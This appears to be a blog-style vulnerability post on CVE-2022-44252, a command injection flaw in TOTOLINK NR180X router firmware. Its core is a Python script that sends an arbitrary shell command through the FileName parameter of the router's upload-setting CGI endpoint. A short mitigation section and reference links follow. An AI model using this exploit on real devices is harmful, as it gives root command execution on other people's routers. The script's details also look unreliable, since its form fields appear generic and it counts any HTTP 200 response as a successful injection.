CVE-2022-44252 - TOTOLINK NR180X V9.1.u.6279_B20210910 Command Injection Vulnerability Exploitation via FileName Parameter in setUploadSetting Function
In the world of networking devices and routers, security is of utmost importance. Recently, a critical vulnerability was discovered in the popular TOTOLINK NR180X router, a model common in small businesses and households. This vulnerability, indexed as CVE-2022-44252, allows attackers to perform a command injection via the FileName parameter in the setUploadSetting function. In this post, we will explore the exploit details, provide a code snippet to demonstrate the issue, and offer links to the original references for further information.
Exploit Details
The CVE-2022-44252 vulnerability exists in the TOTOLINK NR180X router with the firmware version V9.1.u.6279_B20210910. The vulnerability is caused by improper validation of input given to the FileName parameter in the setUploadSetting function. This allows an attacker to craft a specially formatted request and inject arbitrary shell commands, which can be executed as a root user on the system, potentially leading to unauthorized access, information disclosure, and other severe consequences.
Code Snippet
To exploit this vulnerability, an attacker can use a simple HTTP POST request with a specially crafted FileName parameter containing the malicious command. Below is a simple Python script utilizing the 'requests' library to demonstrate the exploit:
import requests
target_url = "http://<TARGET_IP>/cgi-bin/webupg/web.cgi"; # Replace <TARGET_IP> with the target router's IP address
command = "YOUR_COMMAND" # Replace with the desired shell command to be injected
payload = {
"submit_flag": "webupg",
"setUploadSetting": "2",
"FileName": f"{command}"
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
response = requests.post(target_url, data=payload, headers=headers)
if response.status_code == 200:
print(f"Command injection successful: {command}")
else:
print("Command injection failed")
Replace with the target router's IP address and YOUR_COMMAND with the desired shell command to be injected.
Original References
For more information about this vulnerability and its original documentation, please visit the following links:
1. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44252
2. NVD - National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-44252
3. Exploit Database: https://www.exploit-db.com/exploits/52815
Mitigation
It is crucial for users with a TOTOLINK NR180X router running the affected firmware version to update their device as soon as an official patch is released by the manufacturer. Ensure that the router's management interface is not accessible from the internet and is only accessible via a trusted local network.
Conclusion
CVE-2022-44252 poses a severe risk to TOTOLINK NR180X routers running the affected firmware version. Ensuring that devices are updated and properly secured is essential to protect against such threats.
Timeline
Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:42:00 UTC